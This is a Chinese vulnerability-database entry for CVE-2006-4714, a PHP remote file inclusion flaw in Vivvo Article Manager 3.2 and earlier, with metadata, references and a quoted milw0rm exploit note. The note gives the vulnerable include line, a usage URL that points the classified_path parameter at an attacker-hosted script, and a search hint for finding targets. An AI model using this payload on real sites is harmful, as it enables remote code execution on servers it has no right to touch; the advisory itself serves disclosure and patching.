SpoonLabs Vivvo Article Management CMS'index.php'PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110988 漏洞类型 未知
发布时间 2006-09-09 更新时间 2006-09-12
CVE编号 CVE-2006-4714 CNNVD-ID CNNVD-200609-189
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2339
https://www.securityfocus.com/bid/84147
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-189
|漏洞详情
SpoonLabsVivvoArticleManagementCMS(也称为phpWordPress)3.2及更早版本的index.php中的PHP远程文件包含漏洞,在启用register_globals时,远程攻击者可以通过classified_path参数中的URL执行任意PHP代码。
|漏洞EXP
#########################################################################
#MercilessTurk info@kahramanhost.com
#########################################################################
#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2
#########################################################################
#Vulnerable Code in HTML_function.php function HTML_Category_Menu() :
#line 51: include_once($classified_path.'export_category.php');
#if register_globals = On then this code can include $_GET['classified_path']
#in index.php HTML_Category_Menu() function is called:
#line 45:
#$box_sections_HTML=HTML_Category_Menu();
#########################################################################
#Usage:
#http://[target]/[path]/index.php?classified_path=http://[evil_script]?
#########################################################################
#For google searching:Vivvo Article Manager
#########################################################################
#Greetz: sanaldarbe.com members.
#########################################################################

# milw0rm.com [2006-09-09]
|参考资料

来源:SECUNIA
名称:21855
链接:http://secunia.com/advisories/21855
来源:MILW0RM
名称:2339
链接:http://www.milw0rm.com/exploits/2339
来源:VUPEN
名称:ADV-2006-3548
链接:http://www.frsirt.com/english/advisories/2006/3548
来源:MISC
链接:http://securitydot.net/xpl/exploits/vulnerabilities/articles/1467/exploit.html
来源:XF
名称:vivvo-index-file-include(28834)
链接:http://xforce.iss.net/xforce/xfdb/28834
来源:MILW0RM
名称:2339
链接:http://milw0rm.com/exploits/2339